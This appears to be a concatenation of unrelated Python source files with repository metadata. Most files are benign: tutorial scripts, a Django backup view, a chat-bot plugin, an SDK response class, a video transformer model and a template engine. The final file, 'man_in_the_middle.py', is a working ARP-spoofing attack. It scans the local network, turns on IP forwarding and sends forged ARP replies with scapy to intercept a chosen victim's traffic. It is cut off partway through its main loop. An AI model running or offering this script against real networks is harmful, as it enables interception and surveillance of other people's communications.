data_url = "http://www.compjour.org/files/code/json-examples/maps.googleapis-geocode-mcclatchy.json"
# fetch the data file
response = requests.get(data_url)
text = response.text
# parse the data
data = json.loads(text)
print('A.', data['results'][0]['formatted_address'])
print('B.', data['status'])
print('C.', data['results'][0]['geometry']['location_type'])
print('D.', data['results'][0]['geometry']['location']['lat'])
print('E.', data['results'][0]['geometry']['viewport']['southwest']['lng'])
num_to_print = 2
sep = ', '
print('F.', sep.join([x['long_name'] for x in data['results'][0]['address_components'][:num_to_print]]))
|
[
"[email protected]"
] | |
a8777de0fff2f753f2a10440eda5dc07631663cd
|
a63d907ad63ba6705420a6fb2788196d1bd3763c
|
/src/api/dataflow/stream/handlers/dataflow_yaml_execute_log.py
|
ec10a68c37c3a15e1547efc90d0f256f3089bb28
|
[
"MIT"
] |
permissive
|
Tencent/bk-base
|
a38461072811667dc2880a13a5232004fe771a4b
|
6d483b4df67739b26cc8ecaa56c1d76ab46bd7a2
|
refs/heads/master
| 2022-07-30T04:24:53.370661 | 2022-04-02T10:30:55 | 2022-04-02T10:30:55 | 381,257,882 | 101 | 51 |
NOASSERTION
| 2022-04-02T10:30:56 | 2021-06-29T06:10:01 |
Python
|
UTF-8
|
Python
| false | false | 1,629 |
py
|
# -*- coding: utf-8 -*-
"""
Tencent is pleased to support the open source community by making BK-BASE 蓝鲸基础平台 available.
Copyright (C) 2021 THL A29 Limited, a Tencent company. All rights reserved.
BK-BASE 蓝鲸基础平台 is licensed under the MIT License.
License for BK-BASE 蓝鲸基础平台:
--------------------------------------------------------------------
Permission is hereby granted, free of charge, to any person obtaining a copy of this software and associated
documentation files (the "Software"), to deal in the Software without restriction, including without limitation
the rights to use, copy, modify, merge, publish, distribute, sublicense, and/or sell copies of the Software,
and to permit persons to whom the Software is furnished to do so, subject to the following conditions:
The above copyright notice and this permission notice shall be included in all copies or substantial
portions of the Software.
THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR IMPLIED, INCLUDING BUT NOT
LIMITED TO THE WARRANTIES OF MERCHANTABILITY, FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN
NO EVENT SHALL THE AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER LIABILITY,
WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM, OUT OF OR IN CONNECTION WITH THE
SOFTWARE OR THE USE OR OTHER DEALINGS IN THE SOFTWARE.
"""
from dataflow.stream.models import DataFlowYamlExecuteLog
def get(task_id):
return DataFlowYamlExecuteLog.objects.get(id=task_id)
def create(**kwargs):
return DataFlowYamlExecuteLog.objects.create(**kwargs)
|
[
"[email protected]"
] | |
a5f0b3191bcadf185372843a5c817ae11372a54b
|
146db0a1ba53d15ab1a5c3dce5349907a49217c3
|
/omega_miya/plugins/nbnhhsh/__init__.py
|
7866c153d40576e1b4b45923a629b974818a5e08
|
[
"Python-2.0",
"MIT"
] |
permissive
|
hailong-z/nonebot2_miya
|
84d233122b2d785bfc230c4bfb29326844700deb
|
7d52ef52a0a13c5ac6519199e9146a6e3c80bdce
|
refs/heads/main
| 2023-03-26T14:59:31.107103 | 2021-03-09T17:01:08 | 2021-03-09T17:01:08 | null | 0 | 0 | null | null | null | null |
UTF-8
|
Python
| false | false | 2,827 |
py
|
import re
from nonebot import on_command, export, logger
from nonebot.typing import T_State
from nonebot.adapters.cqhttp.bot import Bot
from nonebot.adapters.cqhttp.event import GroupMessageEvent
from nonebot.adapters.cqhttp.permission import GROUP
from omega_miya.utils.Omega_plugin_utils import init_export
from omega_miya.utils.Omega_plugin_utils import has_command_permission, permission_level
from .utils import get_guess
# Custom plugin usage text
__plugin_name__ = '好好说话'
__plugin_usage__ = r'''【能不能好好说话?】
拼音首字母缩写释义
**Permission**
Command & Lv.30
**Usage**
/好好说话 [缩写]'''
# Init plugin export
init_export(export(), __plugin_name__, __plugin_usage__)
# Register the event responder
nbnhhsh = on_command('好好说话', rule=has_command_permission() & permission_level(level=30), aliases={'hhsh', 'nbnhhsh'},
permission=GROUP, priority=20, block=True)
# Customize the default argument parsing
@nbnhhsh.args_parser
async def parse(bot: Bot, event: GroupMessageEvent, state: T_State):
args = str(event.get_plaintext()).strip().lower().split()
if not args:
await nbnhhsh.reject('你似乎没有发送有效的参数呢QAQ, 请重新发送:')
state[state["_current_key"]] = args[0]
if state[state["_current_key"]] == '取消':
await nbnhhsh.finish('操作已取消')
@nbnhhsh.handle()
async def handle_first_receive(bot: Bot, event: GroupMessageEvent, state: T_State):
args = str(event.get_plaintext()).strip().lower().split()
if not args:
pass
elif args and len(args) == 1:
state['guess'] = args[0]
else:
await nbnhhsh.finish('参数错误QAQ')
@nbnhhsh.got('guess', prompt='有啥缩写搞不懂?')
async def handle_nbnhhsh(bot: Bot, event: GroupMessageEvent, state: T_State):
guess = state['guess']
if re.match(r'^[a-zA-Z0-9]+$', guess):
res = await get_guess(guess=guess)
if res.success() and res.result:
try:
data = dict(res.result[0])
except Exception as e:
logger.error(f'nbnhhsh error: {repr(e)}')
await nbnhhsh.finish('发生了意外的错误QAQ, 请稍后再试')
return
if data.get('trans'):
trans = str.join('\n', data.get('trans'))
msg = f"为你找到了{guess}的以下解释:\n\n{trans}"
await nbnhhsh.finish(msg)
elif data.get('inputting'):
trans = str.join('\n', data.get('inputting'))
msg = f"为你找到了{guess}的以下解释:\n\n{trans}"
await nbnhhsh.finish(msg)
await nbnhhsh.finish(f'没有找到{guess}的相关解释QAQ')
else:
await nbnhhsh.finish('缩写仅支持字母加数字, 请重新输入')
|
[
"[email protected]"
] | |
29d68c117848a99093caea9576f255c3fd233bb3
|
c7fc1265dd09cae456c978c09643811bf3aa89d7
|
/mileage_cal.py
|
722bfc599c73d4858c72caed5ac2bbc36aa3fabd
|
[] |
no_license
|
chandraprakashh/Data_Handling
|
e136c6bc188506ca6660becd434d5a17bed8e199
|
59f43288dea379f8fe0bb0fe01b17d0e5e99e057
|
refs/heads/master
| 2020-07-18T18:11:25.908312 | 2020-01-13T10:24:51 | 2020-01-13T10:24:51 | 206,290,142 | 0 | 0 | null | null | null | null |
UTF-8
|
Python
| false | false | 566 |
py
|
# -*- coding: utf-8 -*-
"""
Spyder Editor
This is a temporary script file.
"""
"""
1.Code Challenge
Name:
Gas Mileage Calculator
Filename:
mileage_cal.py
Problem Statement:
Assume my car travels 100 Kilometres after putting 5 litres of fuel.
Calculate the average of my car.
Hint:
    Divide kilometres by the litres used to get the average
"""
# car travels 100 kilometres
distance = 100
# putting 5 litres of fuel
fuel = 5
# average
average = distance / fuel
print("average of my car = {}".format(average))
|
[
"[email protected]"
] | |
4abd4f456948302874dfdc97f41babf31670d96a
|
4786fe9537fbcb50b7490f7f95624e9c8589801f
|
/ex21a.py
|
b80932994d975a1f5b8f8cfd3bbc785b73fc603b
|
[] |
no_license
|
dbialon/LPTHW
|
075e5a82c541dd277ee30f5ebbc221e30c63e29e
|
3e6674cded2bcd90d4a098efd00a71abeb33bdc5
|
refs/heads/master
| 2022-06-07T02:14:18.180807 | 2020-05-02T13:30:52 | 2020-05-02T13:30:52 | 259,911,016 | 0 | 0 | null | null | null | null |
UTF-8
|
Python
| false | false | 723 |
py
|
def add(a, b):
print(f"ADDING {a} + {b}")
return a + b
def subtract(a, b):
print(f"SUBTRACTING {a} - {b}")
return a - b
def multiply(a, b):
print(f"MULTIPLYING {a} * {b}")
return a * b
def divide(a, b):
print(f"DIVIDING {a} / {b}")
return a / b
print("""
This program will execute the following calculation:
(A - B) / C * D + E
""")
varA = float(input("What is your A? --- "))
varB = float(input("What is your B? --- "))
varC = float(input("What is your C? --- "))
varD = float(input("What is your D? --- "))
varE = float(input("What is your E? --- "))
print()
result = add(multiply(divide(subtract(varA, varB), varC), varD), varE)
print("\nThat becomes:", result)
|
[
"[email protected]"
] | |
8f45532721df9ce375e512eac8e8b5d2f48bbfcc
|
fe2eef159f7e75b6a3b4ecbacab53a19df33b8eb
|
/setup.py
|
3c3eff7248dd676186f2778a2b4149610c6dc6e0
|
[
"MIT"
] |
permissive
|
a1fred/django-model-render
|
6b9572ff26ced93e6de0aa15ac97fef1217ebeba
|
0912b2ec9d33bada8875a57f7af9eb18d24e1e84
|
refs/heads/master
| 2020-09-12T19:23:57.847976 | 2017-01-02T20:49:20 | 2017-01-02T20:49:20 | 32,887,644 | 0 | 0 | null | null | null | null |
UTF-8
|
Python
| false | false | 1,077 |
py
|
#!/usr/bin/python
# -*- coding: utf-8 -*-
from setuptools import setup
requirements = [
'django>=1.4',
]
setup(
name='django-model-render',
version='0.5',
description='Django models extension that allows define default model templates',
author='a1fred',
author_email='[email protected]',
license='MIT',
url='https://github.com/a1fred/django-model-render',
packages=['model_render'],
test_suite="runtests",
platforms=['any'],
zip_safe=False,
install_requires=requirements,
tests_require=requirements,
classifiers=[
'Development Status :: 5 - Production/Stable',
'Environment :: Django',
'Intended Audience :: Developers',
'License :: OSI Approved :: MIT License',
'Operating System :: MacOS :: MacOS X',
'Operating System :: Unix',
'Operating System :: POSIX',
'Programming Language :: Python',
'Programming Language :: Python :: 3.4',
'Programming Language :: Python :: 3.5',
'Programming Language :: Python :: 3.6',
],
)
|
[
"[email protected]"
] | |
c174a2e44b99cb6349ff944069b1b602555b46c7
|
892c35f72f46f145c3f3860c1c29f1f4503ef9a6
|
/search/search.py
|
fb2fa2520ad49d842fb5e069fbe0011cfdf4eb90
|
[] |
no_license
|
pymmrd/tuangou
|
aaa2b857e352f75f2ba0aa024d2880a6adac21a8
|
8f6a35dde214e809cdd6cbfebd8d913bafd68fb2
|
refs/heads/master
| 2021-01-10T20:31:55.238764 | 2013-11-13T13:53:53 | 2013-11-13T13:53:53 | 7,911,285 | 0 | 1 | null | null | null | null |
UTF-8
|
Python
| false | false | 1,244 |
py
|
import re
import string
from django.db.models import Q
from django.conf import settings
from tuangou.search.models import SearchTerm
from tuangou.stats.utils import stats
from tuangou.utils.location import get_current_city
def store(request, q):
    # if the search term is at least two chars long, store it in the db
if len(q) >= 2:
tracking_id = stats.tracking_id(request)
terms = SearchTerm.objects.filter(tracking_id=tracking_id, q=q).count()
if not terms:
term = SearchTerm()
term.q = q
term.tracking_id = stats.tracking_id(request)
term.ip_address = request.META.get('REMOTE_ADDR')
term.user = None
if request.user.is_authenticated():
term.user = request.user
term.save()
# get deals matching the search text
def deals(request, search_text):
from tuangou.guider.models import ReDeal
city = request.session.get('city', None)
deals = ReDeal.nonexpires.all()
results = {}
results['deals'] = {}
for word in search_text:
deals = deals.filter(Q(title__contains=word)|
Q(division__name__contains=word))
results['deals'] = deals[:settings.DEAL_PER_ROW]
return results
|
[
"zg163@zg163-Lenovo-IdeaPad-Y470.(none)"
] |
zg163@zg163-Lenovo-IdeaPad-Y470.(none)
|
326f5de126d44ed5c242cb25b5cef8c4788a9c97
|
fffcc24d7c3fbadd615db1c2de632ebec72b92da
|
/cgi-bin/simpletemplate.py
|
3551d703604abe395986350f77e0ad80b887ef96
|
[] |
no_license
|
kimihito/minpy
|
35a5cf1596979e3bc57d6bfb6fcded03ae10f0d3
|
6273d43f65279d800a37a5dd9b34488d2cea54a1
|
refs/heads/master
| 2016-08-08T02:10:02.967527 | 2012-06-11T13:57:23 | 2012-06-11T13:57:23 | 4,147,292 | 2 | 0 | null | null | null | null |
UTF-8
|
Python
| false | false | 4,517 |
py
|
#!/usr/bin/env python
# coding: utf-8
import re
if_pat=re.compile(r"\$if\s+(.*\:)")
endif_pat=re.compile(r"\$endif")
for_pat=re.compile(r"\$for\s+(.*)\s+in\s+(.*\:)")
endfor_pat=re.compile(r"\$endfor")
value_pat=re.compile(r"\${(.+?)}")
class SimpleTemplate(object):
"""
    A template engine with a simple feature set.
"""
def __init__(self, body='', file_path=None):
"""
        Initialization method.
"""
if file_path:
f=open(file_path)
body=unicode(f.read(), 'utf-8', 'ignore')
body=body.replace('\r\n', '\n')
self.lines = body.split('\n')
self.sentences = ((if_pat, self.handle_if),
(for_pat, self.handle_for),
(value_pat, self.handle_value),)
def render(self, kws={}):
"""
        Render the template.
"""
l, o=self.process(kws=kws)
return o
def find_matchline(self, pat, start_line=0):
"""
        Take a regular expression and return the index of the first matching line.
"""
cur_line=start_line
for line in self.lines[start_line:]:
if pat.search(line):
return cur_line
cur_line+=1
return -1
def process(self, exit_pats=(), start_line=0, kws={}):
"""
        Perform the template rendering.
"""
output=u''
cur_line=start_line
while len(self.lines) > cur_line:
line=self.lines[cur_line]
for exit_pat in exit_pats:
if exit_pat.search(line):
return cur_line+1, output
for pat, handler in self.sentences:
m=pat.search(line)
pattern_found=False
if m:
try:
cur_line, out=handler(m, cur_line, kws)
pattern_found=True
output+=out
break
except Exception, e:
raise e #Exception("Following error occured in line %d\n%s" % (cur_line, str(e)))
if not pattern_found:
output+=line+'\n'
cur_line+=1
if exit_pats:
raise "End of lines while parsing"
return cur_line, output
def handle_value(self, _match, _line_no, _kws={}):
"""
        Handle ${...} value substitutions.
"""
_line=self.lines[_line_no]
_rep=[]
locals().update(_kws)
pos=0
while True:
_m=value_pat.search(_line[pos:])
if not _m:
break
pos+=_m.end()
_rep.append( (_m.group(1), unicode(eval(_m.group(1)))) )
for t, r in _rep:
_line=_line.replace('${%s}'%t, r)
return _line_no, _line+'\n'
def handle_if(self, _match, _line_no, _kws={}):
"""
        Handle the $if statement.
"""
_cond=_match.group(1)
if not _cond:
raise "SyntaxError: invalid syntax in line %d" % line_no
_cond=_cond[:-1]
locals().update(_kws)
_line, _out=self.process((endif_pat, ), _line_no+1, _kws)
if not eval(_cond):
_out=''
return _line-1, _out
def handle_for(self, _match, _line_no, _kws={}):
"""
        Handle the $for statement.
"""
_var=_match.group(1)
_exp=_match.group(2)
if not _var or not _exp:
raise "SyntaxError: invalid syntax in line %d" % line_no
locals().update(_kws)
_seq=eval(_exp[:-1])
_out=''
if not _seq:
return self.find_matchline(endfor_pat, _line_no), _out
for _v in _seq:
_kws.update({_var:_v})
_line, _single_out=self.process((endfor_pat, ), _line_no+1, _kws)
_out+=_single_out
return _line-1, _out
def main():
t=SimpleTemplate("""aaaa
$if 1==1:
if clause0
$endif
$if 1==1:
if clause1
$if 1==1:
if clause1-2
$endif
$else:
else clause1
$endif
$if 1==1:
if clause2
$endif
$if 1==2:
if clause3
$else:
else clause3
$endif
bbbb
""")
print t.render()
print "-"*40
t=SimpleTemplate("""
<select name="fruit">
$for val in ["Apple", "Banana", "Melon"]:
<optioin value="${val}">${val}</option>
$endfor
</select>
""")
print t.render()
if __name__=='__main__':
"""
import pdb
pdb.run('main()')
"""
main()
|
[
"[email protected]"
] | |
7f329a56f3c63d6f634c341fe1ee1a609f562304
|
eef39fd96ef4ed289c1567f56fde936d5bc42ea4
|
/BaekJoon/Bronze2/15969.py
|
803573cbb6d19798b9968fcd14d2be7454bafc32
|
[] |
no_license
|
dudwns9331/PythonStudy
|
3e17da9417507da6a17744c72835c7c2febd4d2e
|
b99b9ef2453af405daadc6fbf585bb880d7652e1
|
refs/heads/master
| 2023-06-15T12:19:56.019844 | 2021-07-15T08:46:10 | 2021-07-15T08:46:10 | 324,196,430 | 4 | 0 | null | null | null | null |
UTF-8
|
Python
| false | false | 1,452 |
py
|
# Happiness
"""
2021-01-22 1:37 AM
안영준
Problem
The newly appointed principal of Koi Elementary School decided to look into the relationship
between young students' happiness and the differences in their grades.
So the principal examined past grades to see how the gaps between test scores change.
For example, suppose the scores of 8 students in 2016 were as follows.
27, 35, 92, 75, 42, 53, 29, 87
The highest score is 92 and the lowest is 27, so the maximum score difference is 65.
Meanwhile, the scores of 8 students in 2017 were as follows.
85, 42, 79, 95, 37, 11, 72, 32
Here the highest score is 95 and the lowest is 11, so the maximum score difference is 84.
Given the scores of N students, write a program that finds the difference between
the highest and the lowest score.
Input
The following is given on standard input. The first line contains the number of students, N.
The next line contains the N students' scores separated by single spaces.
Output
Print the difference between the highest and the lowest score to standard output.
Constraints
In every subtask, 2 ≤ N ≤ 1,000 and each student's score is an integer between 0 and 1,000.
"""
N = int(input())
score = list(map(int, input().split()))
score.sort()
print(score[-1] - score[0])
|
[
"[email protected]"
] | |
d830da1f9d9e07fe504090cca4bc6f96ec19b136
|
5a52ccea88f90dd4f1acc2819997fce0dd5ffb7d
|
/alipay/aop/api/response/SsdataDataserviceRiskAntifraudscoreQueryResponse.py
|
eb88453a0ac5e908d0040c632adda75bafe8c3cc
|
[
"Apache-2.0"
] |
permissive
|
alipay/alipay-sdk-python-all
|
8bd20882852ffeb70a6e929038bf88ff1d1eff1c
|
1fad300587c9e7e099747305ba9077d4cd7afde9
|
refs/heads/master
| 2023-08-27T21:35:01.778771 | 2023-08-23T07:12:26 | 2023-08-23T07:12:26 | 133,338,689 | 247 | 70 |
Apache-2.0
| 2023-04-25T04:54:02 | 2018-05-14T09:40:54 |
Python
|
UTF-8
|
Python
| false | false | 1,247 |
py
|
#!/usr/bin/env python
# -*- coding: utf-8 -*-
import json
from alipay.aop.api.response.AlipayResponse import AlipayResponse
class SsdataDataserviceRiskAntifraudscoreQueryResponse(AlipayResponse):
def __init__(self):
super(SsdataDataserviceRiskAntifraudscoreQueryResponse, self).__init__()
self._biz_no = None
self._score = None
self._unique_id = None
@property
def biz_no(self):
return self._biz_no
@biz_no.setter
def biz_no(self, value):
self._biz_no = value
@property
def score(self):
return self._score
@score.setter
def score(self, value):
self._score = value
@property
def unique_id(self):
return self._unique_id
@unique_id.setter
def unique_id(self, value):
self._unique_id = value
def parse_response_content(self, response_content):
response = super(SsdataDataserviceRiskAntifraudscoreQueryResponse, self).parse_response_content(response_content)
if 'biz_no' in response:
self.biz_no = response['biz_no']
if 'score' in response:
self.score = response['score']
if 'unique_id' in response:
self.unique_id = response['unique_id']
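# Usage sketch (not part of the original file): the properties above can be
# set and read directly once a response has been parsed.
# resp = SsdataDataserviceRiskAntifraudscoreQueryResponse()
# resp.biz_no = '2021123100001'  # illustrative value
# print(resp.biz_no, resp.score, resp.unique_id)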
|
[
"[email protected]"
] | |
675dda5c8c83bf0f987ede0d78116c521d6932a4
|
a6c0bb39fe1f5218094f9d8a728d32c7348414b8
|
/timesformer_pytorch/timesformer_pytorch.py
|
dfbbfbb447de3d906549636f03dc5833d4f4c0ce
|
[
"MIT"
] |
permissive
|
Willforcv/TimeSformer-pytorch
|
042f23cd4e02e973fc0374579f18a4b529309edb
|
4e4a60d4876a45cceddcf8af514eb39eac40ff96
|
refs/heads/main
| 2023-03-20T16:54:42.934377 | 2021-03-21T19:14:02 | 2021-03-21T19:14:02 | null | 0 | 0 | null | null | null | null |
UTF-8
|
Python
| false | false | 5,494 |
py
|
import torch
from torch import nn, einsum
import torch.nn.functional as F
from einops import rearrange, repeat
# classes
class RMSNorm(nn.Module):
def __init__(self, dim, eps = 1e-8):
super().__init__()
self.scale = dim ** -0.5
self.eps = eps
self.g = nn.Parameter(torch.ones(1))
def forward(self, x):
norm = torch.norm(x, dim = -1, keepdim = True) * self.scale
return x / norm.clamp(min = self.eps) * self.g
class PreNorm(nn.Module):
def __init__(self, dim, fn):
super().__init__()
self.fn = fn
self.norm = RMSNorm(dim)
def forward(self, x, *args, **kwargs):
x = self.norm(x)
return self.fn(x, *args, **kwargs)
# feedforward
class GEGLU(nn.Module):
def forward(self, x):
x, gates = x.chunk(2, dim = -1)
return x * F.gelu(gates)
class FeedForward(nn.Module):
def __init__(self, dim, mult = 4, dropout = 0.):
super().__init__()
self.net = nn.Sequential(
nn.Linear(dim, dim * mult * 2),
GEGLU(),
nn.Dropout(dropout),
nn.Linear(dim * mult, dim)
)
def forward(self, x):
return self.net(x)
# attention
def attn(q, k, v):
sim = einsum('b i d, b j d -> b i j', q, k)
attn = sim.softmax(dim = -1)
out = einsum('b i j, b j d -> b i d', attn, v)
return out
class Attention(nn.Module):
def __init__(
self,
dim,
dim_head = 64,
heads = 8,
dropout = 0.
):
super().__init__()
self.heads = heads
self.scale = dim_head ** -0.5
inner_dim = dim_head * heads
self.to_qkv = nn.Linear(dim, inner_dim * 3, bias = False)
self.to_out = nn.Sequential(
nn.Linear(inner_dim, dim),
nn.Dropout(dropout)
)
def forward(self, x, einops_from, einops_to, **einops_dims):
h = self.heads
q, k, v = self.to_qkv(x).chunk(3, dim = -1)
q, k, v = map(lambda t: rearrange(t, 'b n (h d) -> (b h) n d', h = h), (q, k, v))
q *= self.scale
# splice out classification token at index 1
(cls_q, q_), (cls_k, k_), (cls_v, v_) = map(lambda t: (t[:, 0:1], t[:, 1:]), (q, k, v))
# let classification token attend to key / values of all patches across time and space
cls_out = attn(cls_q, k, v)
# rearrange across time or space
q_, k_, v_ = map(lambda t: rearrange(t, f'{einops_from} -> {einops_to}', **einops_dims), (q_, k_, v_))
# expand cls token keys and values across time or space and concat
r = q_.shape[0] // cls_k.shape[0]
cls_k, cls_v = map(lambda t: repeat(t, 'b () d -> (b r) () d', r = r), (cls_k, cls_v))
k_ = torch.cat((cls_k, k_), dim = 1)
v_ = torch.cat((cls_v, v_), dim = 1)
# attention
out = attn(q_, k_, v_)
# merge back time or space
out = rearrange(out, f'{einops_to} -> {einops_from}', **einops_dims)
# concat back the cls token
out = torch.cat((cls_out, out), dim = 1)
# merge back the heads
out = rearrange(out, '(b h) n d -> b n (h d)', h = h)
# combine heads out
return self.to_out(out)
# main classes
class TimeSformer(nn.Module):
def __init__(
self,
*,
dim,
num_frames,
num_classes,
image_size = 224,
patch_size = 16,
channels = 3,
depth = 12,
heads = 8,
dim_head = 64,
attn_dropout = 0.,
ff_dropout = 0.
):
super().__init__()
assert image_size % patch_size == 0, 'Image dimensions must be divisible by the patch size.'
num_patches = (image_size // patch_size) ** 2
num_positions = num_frames * num_patches
patch_dim = channels * patch_size ** 2
self.patch_size = patch_size
self.to_patch_embedding = nn.Linear(patch_dim, dim)
self.pos_emb = nn.Embedding(num_positions + 1, dim)
self.cls_token = nn.Parameter(torch.randn(1, dim))
self.layers = nn.ModuleList([])
for _ in range(depth):
self.layers.append(nn.ModuleList([
PreNorm(dim, Attention(dim, dim_head = dim_head, heads = heads, dropout = attn_dropout)),
PreNorm(dim, Attention(dim, dim_head = dim_head, heads = heads, dropout = attn_dropout)),
PreNorm(dim, FeedForward(dim, dropout = ff_dropout))
]))
self.to_out = nn.Sequential(
RMSNorm(dim),
nn.Linear(dim, num_classes)
)
def forward(self, video):
b, f, _, h, w, *_, device, p = *video.shape, video.device, self.patch_size
assert h % p == 0 and w % p == 0, f'height {h} and width {w} of video must be divisible by the patch size {p}'
n = (h // p) * (w // p)
video = rearrange(video, 'b f c (h p1) (w p2) -> b (f h w) (p1 p2 c)', p1 = p, p2 = p)
tokens = self.to_patch_embedding(video)
cls_token = repeat(self.cls_token, 'n d -> b n d', b = b)
x = torch.cat((cls_token, tokens), dim = 1)
x += self.pos_emb(torch.arange(x.shape[1], device = device))
for (time_attn, spatial_attn, ff) in self.layers:
x = time_attn(x, 'b (f n) d', '(b n) f d', n = n) + x
x = spatial_attn(x, 'b (f n) d', '(b f) n d', f = f) + x
x = ff(x) + x
cls_token = x[:, 0]
return self.to_out(cls_token)
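# Usage sketch (not part of the original file; the hyperparameter values are
# assumptions, chosen only to make the shapes concrete):
# model = TimeSformer(dim=512, image_size=224, patch_size=16, num_frames=8,
#                     num_classes=10, depth=12, heads=8)
# video = torch.randn(2, 8, 3, 224, 224)  # (batch, frames, channels, height, width)
# preds = model(video)                    # -> shape (2, 10)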
|
[
"[email protected]"
] | |
c8aa130be7fae098e4c52b4cee2c663da7e8857d
|
50ba981bc65efea92f61c698cecfbbe3214a724e
|
/Django_DB_Backup/App/views.py
|
f634d2abf55cd3aa4e2af403c7b5c2c6d7ea4e24
|
[] |
no_license
|
shubhamjain31/demorepo
|
ff0a4283fc866ea94df1c340da430271daf93cb6
|
90639b8622e68155ff19bfec0bb6925b421f04cf
|
refs/heads/master
| 2023-04-27T03:42:10.057387 | 2022-06-28T06:14:44 | 2022-06-28T06:14:44 | 229,792,545 | 1 | 0 | null | 2023-04-21T21:36:24 | 2019-12-23T17:04:22 |
Python
|
UTF-8
|
Python
| false | false | 2,012 |
py
|
from django.shortcuts import render
from django.http import HttpResponse, JsonResponse
from itertools import chain
from django.contrib.auth.models import User
from django.views.decorators.csrf import csrf_exempt
from django.core import serializers
from django.contrib.admin.utils import NestedObjects
from django.core.management import call_command
import re
from App.models import *
# Create your views here.
def index(request):
return render(request, 'index.html')
def dbtable(request):
all_users = User.objects.all()
params = {'all_users':all_users}
return render(request, 'backupandrestore.html', params)
@csrf_exempt
def create_backup(request):
_pk = request.POST.get('_id')
# user object
user_obj = User.objects.get(pk=_pk)
    # NestedObjects, from the admin contrib package, is a Collector subclass.
collector = NestedObjects(using="default") # database name
# create an object of NestedObjects
collector.collect([user_obj])
# create a list of all objects of all tables with foreign keys
objects = list(chain.from_iterable(collector.data.values()))
    # store the data in a file
with open("dbfiles/{}.json".format(user_obj.username), "w") as f:
s = serializers.serialize("json", objects, use_natural_foreign_keys=True, use_natural_primary_keys=True, indent = 4)
# make all tables objects pks null
# s = re.sub('"pk": [0-9]{1,5}', '"pk": null', s)
f.write(s)
data = {
'msg': 'Backup Created Successfully'
}
return JsonResponse(data)
@csrf_exempt
def restore_backup(request):
_pk = request.POST.get('_id')
# user object
user_obj = User.objects.get(pk=_pk)
# delete all relation of user object
Post.objects.filter(author=user_obj).delete()
Description.objects.filter(post_desc=user_obj).delete()
# file name
filename = "dbfiles/{}.json".format(user_obj.username)
# use call command for restore a data
call_command('loaddata', '{}'.format(filename))
data = {
'msg': 'Restore Backup Successfully'
}
return JsonResponse(data)
|
[
"[email protected]"
] | |
29f5a4ba9b7219b748f52e07f89157085e7a71a9
|
60c39402b6c957e5dfae0c63b5d7af13d9ba9350
|
/man_in_the_middle.py
|
8bd0947f1e8e9f0ddc3b0bb140e90309fd35c323
|
[] |
no_license
|
palex88/deauth
|
91747ac1a0143c7601351ebdd874b5e748380d06
|
70365da4841b75d46223cb84aa154705aa482fdb
|
refs/heads/master
| 2020-03-10T23:39:30.274222 | 2018-05-07T05:38:47 | 2018-05-07T05:38:47 | 129,645,384 | 0 | 0 | null | null | null | null |
UTF-8
|
Python
| false | false | 4,989 |
py
|
# !usr/bin/env/python
#
# File: man_in_the_middle.py
# Author: Alex Thompson
# Github: [email protected]
# Python Version: 2.7
# Purpose: This script runs a man in the middle attack. It finds the local network IP and MAC addresses, then displays
# to the user all the devices connected to the network. Once the user chooses one of them, the script uses
# scapy to send packets to the AP and the chosen host to route traffic between the AP and the host through
# the machine the script is running on.
#
# Usage: python man_in_the_middle.py
#
# Input: None
# Output: None
#
# Resources:
# https://scapy.readthedocs.io/en/latest/usage.html?highlight=srp
# https://github.com/hotzenklotz/WhoIsHome/blob/master/whoIsHome.py
# https://github.com/glebpro/Man-in-the-Middle/blob/master/m.py
# https://null-byte.wonderhowto.com/how-to/build-man-middle-tool-with-scapy-and-python-0163525/
#
import os
import sys
import time
import socket
import subprocess32
import nmap
from scapy import *
from scapy import all
def scan():
"""
Scans for hosts on a local network and returns hosts IP and MAC addresses.
    Returns:
        A list of dicts with the IP (and, when available, hostname and MAC) of each host.
"""
host_list = str(get_lan_ip()) + "/24"
nmap_args = "-sn"
scanner = nmap.PortScanner()
scanner.scan(hosts=host_list, arguments=nmap_args)
host_list = []
for ip in scanner.all_hosts():
host = {"ip" : ip}
if "hostname" in scanner[ip]:
host["hostname"] = scanner[ip]["hostname"]
if "mac" in scanner[ip]["addresses"]:
host["mac"] = scanner[ip]["addresses"]["mac"].upper()
host_list.append(host)
return host_list
def get_lan_ip():
"""
Scans for local IP addresses on the local network.
"""
try:
return ([(s.connect(('8.8.8.8', 80)), s.getsockname()[0], s.close())
for s in [socket.socket(socket.AF_INET,socket.SOCK_DGRAM)]][0][1])
except socket.error as e:
sys.stderr.write(str(e) + "\n")
sys.exit(e.errno)
def get_local_network_addr():
"""
Get local network IP and MAC address.
"""
proc = subprocess32.Popen(["arp", "-a"], stdout=subprocess32.PIPE)
output = proc.stdout.read().split()
out_ip = output[1]
out_mac = output[3]
return_dict = {"ip": out_ip, "mac": out_mac}
return return_dict
def set_ip_forwarding(toggle):
    if toggle:
        print("Turning on IP forwarding:")
        os.system('echo 1 > /proc/sys/net/ipv4/ip_forward')
    if not toggle:
        print("Turning off IP forwarding:")
        os.system('echo 0 > /proc/sys/net/ipv4/ip_forward')
def reassign_arp(victim_ip, victim_mac, router_ip, router_mac, interface):
"""
Function notifies the AP and the host to start connecting to each other again.
:param victim_ip:
:param victim_mac:
:param router_ip:
:param router_mac:
:param interface:
:return:
"""
print("Reassigning ARP tables:")
# send ARP request to router as-if from victim to connect,
# do it 7 times to be sure
all.send(all.ARP(op=2, pdst=router_ip, psrc=victim_ip,
hwdst="ff:ff:ff:ff:ff:ff", hwsrc=victim_mac), count=7)
# send ARP request to victim as-if from router to connect
# do it 7 times to be sure
all.send(all.ARP(op=2, pdst=victim_ip, psrc=router_ip,
hwdst="ff:ff:ff:ff:ff:ff", hwsrc=router_mac), count=7)
set_ip_forwarding(False)
def attack(victim_ip, victim_mac, router_ip, router_mac):
"""
Performs the MitM attack on the victim.
:param victim_ip:
:param victim_mac:
:param router_ip:
:param router_mac:
:return:
"""
all.send(all.ARP(op=2, pdst=victim_ip, psrc=router_ip, hwdst=victim_mac))
all.send(all.ARP(op=2, pdst=router_ip, psrc=victim_ip, hwdst=router_mac))
if __name__ == '__main__':
subprocess32.call("airmon-ng")
interface = raw_input("Enter wireless interface to use: ")
set_ip_forwarding(True)
hosts = scan()
num = 1
all_hosts = {}
for host in hosts:
if host.has_key("ip") and host.has_key("mac"):
all_hosts[str(num)] = host
